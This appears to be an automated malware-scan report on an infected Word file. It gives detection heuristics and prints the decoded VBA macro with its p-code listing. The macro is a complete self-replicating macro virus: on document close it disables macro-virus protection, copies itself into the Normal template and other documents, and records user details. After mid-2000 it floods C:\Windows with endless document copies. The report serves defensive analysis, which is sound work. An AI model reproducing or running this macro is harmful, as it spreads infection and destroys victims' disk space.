MALICIOUS
220
Risk Score
Heuristics 4
-
ClamAV: Doc.Trojan.Marker-17 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-17
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10392 bytes |
SHA-256: 1cd95080a8cecdcd7309c4072fc7a4ececd4f331d0768134213e66f9c5e7dc13 |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-17
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Shane Coursen
' SC
'
' 5/17/01 11:04:33 AM
'
' Shane Coursen
' SC
'
' 5/17/01 11:04:20 AM
'
' Shane Coursen
' SC
'
' 1/24/2001 10:19:11 AM
'
' Shane Coursen
' SC
'
' 1/24/2001 10:18:58 AM
'
Private Sub Document_Close()
On Error Resume Next
If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
Const exi = "la macro de colombia"
Dim DInfec, planinfec As Boolean
Dim Docu, Plan As Object
Dim modulin, contemodu, Ninfec As String
Dim Nume As Integer
Dim Copform As Object
Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
SaveDoc = ActiveDocument.Saved
Saveplan = NormalTemplate.Saved
DInfec = Docu.codemodule.Find(exi, 1, 1, 40000, 40000)
Plainfec = Plan.codemodule.Find(exi, 1, 1, 40000, 40000)
Ninfec = "'" & " " & Application.UserName & Chr(13) & "'" & " " & Application.UserInitials & Chr(13) & "'" & " " & Application.UserAddress & Chr(13) & "'" & " " & Now() & Chr(13) & "'" & " "
Options.VirusProtection = False
Nume = Mid(Int(Rnd() * 10), 1, 1)
Nume = Nume
nume1 = 7
If Nume = nume1 Or Plainfec = False Then
If DInfec = True And Plainfec = False Then
Docu.codemodule.addfromstring Ninfec
contemodu = Docu.codemodule.Lines(1, Docu.codemodule.CountOfLines)
Plan.codemodule.addfromstring contemodu
End If
If DInfec = False And Plainfec = True Then
Plan.codemodule.addfromstring Ninfec
contemodu = Plan.codemodule.Lines(1, Plan.codemodule.CountOfLines)
Docu.codemodule.addfromstring contemodu
End If
If SaveDoc = True Then ThisDocument.Save
If SaveDoc = True Then NormalTemplate.Save
End If
End If
sd = Day(Now()) & "-" & Month(Now()) & "-" & Year(Now())
sd = Trim(sd)
If Year(Now()) >= 2000 And Month(Now()) > 6 Then
ChangeFileOpenDirectory "C:\Windows\"
For i = 1 To 999999991
ActiveDocument.SaveAs FileName:=("AA" & i & "AA.DOC"), FileFormat:= _
wdFormatDocument, LockComments:=False, Password:="", AddToRecentFiles:= _
True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
SaveAsAOCELetter:=False
Next
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/466b63f722bf4b708222d1b2a3cb5c3b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5466 bytes
' Line #0:
' QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #1:
' QuoteRem 0x0000 0x0003 " SC"
' Line #2:
' QuoteRem 0x0000 0x0000 ""
' Line #3:
' QuoteRem 0x0000 0x0014 " 5/17/01 11:04:33 AM"
' Line #4:
' QuoteRem 0x0000 0x0000 ""
' Line #5:
' QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #6:
' QuoteRem 0x0000 0x0003 " SC"
' Line #7:
' QuoteRem 0x0000 0x0000 ""
' Line #8:
' QuoteRem 0x0000 0x0014 " 5/17/01 11:04:20 AM"
' Line #9:
' QuoteRem 0x0000 0x0000 ""
' Line #10:
' QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #11:
' QuoteRem 0x0000 0x0003 " SC"
' Line #12:
' QuoteRem 0x0000 0x0000 ""
' Line #13:
' QuoteRem 0x0000 0x0016 " 1/24/2001 10:19:11 AM"
' Line #14:
' QuoteRem 0x0000 0x0000 ""
' Line #15:
' QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #16:
' QuoteRem 0x0000 0x0003 " SC"
' Line #17:
' QuoteRem 0x0000 0x0000 ""
' Line #18:
' QuoteRem 0x0000 0x0016 " 1/24/2001 10:18:58 AM"
' Line #19:
' QuoteRem 0x0000 0x0000 ""
' Line #20:
' FuncDefn (Private Sub Document_Close())
' Line #21:
' Line #22:
' OnError (Resume Next)
' Line #23:
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' IfBlock
' Line #24:
' Dim (Const)
' LitStr 0x0014 "la macro de colombia"
' VarDefn exi
' Line #25:
' Dim
' VarDefn DInfec
' VarDefn planinfec (As Boolean)
' Line #26:
' Dim
' VarDefn Docu
' VarDefn Plan (As Object)
' Line #27:
' Dim
' VarDefn modulin
' VarDefn contemodu
' VarDefn Ninfec (As String)
' Line #28:
' Dim
' VarDefn Nume (As Integer)
' Line #29:
' Dim
' VarDefn Copform (As Object)
' Line #30:
' Line #31:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Docu
' Line #32:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Plan
' Line #33:
' Line #34:
' Ld ActiveDocument
' MemLd Saved
' St SaveDoc
' Line #35:
' Ld NormalTemplate
' MemLd Saved
' St Saveplan
' Line #36:
' Line #37:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Docu
' MemLd codemodule
' ArgsMemLd Find 0x0005
' St DInfec
' Line #38:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Plan
' MemLd codemodule
' ArgsMemLd Find 0x0005
' St Plainfec
' Line #39:
' Line #40:
' LitStr 0x0001 "'"
' LitStr 0x0001 " "
' Concat
' Ld Application
' MemLd UserName
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 "'"
' Concat
' LitStr 0x0001 " "
' Concat
' Ld Application
' MemLd UserInitials
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 "'"
' Concat
' LitStr 0x0001 " "
' Concat
' Ld Application
' MemLd UserAddress
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 "'"
' Concat
' LitStr 0x0001 " "
' Concat
' ArgsLd Now 0x0000
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 "'"
' Concat
' LitStr 0x0001 " "
' Concat
' St Ninfec
' Line #41:
' Line #42:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #43:
' Line #44:
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' Mul
' FnInt
' LitDI2 0x0001
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' St Nume
' Line #45:
' Ld Nume
' St Nume
' Line #46:
' LitDI2 0x0007
' St nume1
' Line #47:
' Ld Nume
' Ld nume1
' Eq
' Ld Plainfec
' LitVarSpecial (False)
' Eq
' Or
' IfBlock
' Line #48:
' Line #49:
' Ld DInfec
' LitVarSpecial (True)
' Eq
' Ld Plainfec
' LitVarSpecial (False)
' Eq
' And
' IfBlock
' Line #50:
' Ld Ninfec
' Ld Docu
' MemLd codemodule
' ArgsMemCall addfromstring 0x0001
' Line #51:
' LitDI2 0x0001
' Ld Docu
' MemLd codemodule
' MemLd CountOfLines
' Ld Docu
' MemLd codemodule
' ArgsMemLd Lines 0x0002
' St contemodu
' Line #52:
' Ld contemodu
' Ld Plan
' MemLd codemodule
' ArgsMemCall addfromstring 0x0001
' Line #53:
' EndIfBlock
' Line #54:
' Line #55:
' Ld DInfec
' LitVarSpecial (False)
' Eq
' Ld Plainfec
' LitVarSpecial (True)
' Eq
' And
' IfBlock
' Line #56:
' Ld Ninfec
' Ld Plan
' MemLd codemodule
' ArgsMemCall addfromstring 0x0001
' Line #57:
' LitDI2 0x0001
' Ld Plan
' MemLd codemodule
' MemLd CountOfLines
' Ld Plan
' MemLd codemodule
' ArgsMemLd Lines 0x0002
' St contemodu
' Line #58:
' Ld contemodu
' Ld Docu
' MemLd codemodule
' ArgsMemCall addfromstring 0x0001
' Line #59:
' EndIfBlock
' Line #60:
' Line #61:
' Line #62:
' Line #63:
' Ld SaveDoc
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld ThisDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #64:
' Ld SaveDoc
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' EndIf
' Line #65:
' EndIfBlock
' Line #66:
' EndIfBlock
' Line #67:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitStr 0x0001 "-"
' Concat
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' Concat
' LitStr 0x0001 "-"
' Concat
' ArgsLd Now 0x0000
' ArgsLd Year 0x0001
' Concat
' St sd
' Line #68:
' Ld sd
' ArgsLd Trim 0x0001
' St sd
' Line #69:
' ArgsLd Now 0x0000
' ArgsLd Year 0x0001
' LitDI2 0x07D0
' Ge
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0006
' Gt
' And
' IfBlock
' Line #70:
' LitStr 0x000B "C:\Windows\"
' ArgsCall ChangeFileOpenDirectory 0x0001
' Line #71:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI4 0xC9F7 0x3B9A
' For
' Line #72:
' LineCont 0x0010 0F 00 08 00 1B 00 08 00 27 00 08 00 31 00 08 00
' LitStr 0x0002 "AA"
' Ld i
' Concat
' LitStr 0x0006 "AA.DOC"
' Concat
' Paren
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' LitVarSpecial (False)
' ParamNamed LockComments
' LitStr 0x0000 ""
' ParamNamed Password
' LitVarSpecial (True)
' ParamNamed AddToRecentFiles
' LitStr 0x0000 ""
' ParamNamed WritePassword
' LitVarSpecial (False)
' ParamNamed ReadOnlyRecommended
' LitVarSpecial (False)
' ParamNamed EmbedTrueTypeFonts
' LitVarSpecial (False)
' ParamNamed SaveNativePictureFormat
' LitVarSpecial (False)
' ParamNamed SaveFormsData
' LitVarSpecial (False)
' ParamNamed SaveAsAOCELetter
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x000B
' Line #73:
' StartForVariable
' Next
' Line #74:
' EndIfBlock
' Line #75:
' Line #76:
' EndSub
' Line #77:
' Line #78:
' Line #79:
' Line #80:
' Line #81:
' Line #82:
' Line #83:
' Line #84:
' Line #85:
' Line #86:
' Line #87:
' Line #88:
' Line #89:
' Line #90:
' Line #91:
' Line #92:
' Line #93:
' Line #94:
' Line #95:
' Line #96:
' Line #97:
' Line #98:
' Line #99:
' Line #100:
' Line #101:
' Line #102:
' Line #103:
' Line #104:
' Line #105:
' Line #106:
' Line #107:
' Line #108:
' Line #109:
' Line #110:
' Line #111:
' Line #112:
' Line #113:
' Line #114:
' Line #115:
' Line #116:
' Line #117:
' Line #118:
' Line #119:
' Line #120:
' Line #121:
' Line #122:
' Line #123:
' Line #124:
' Line #125:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.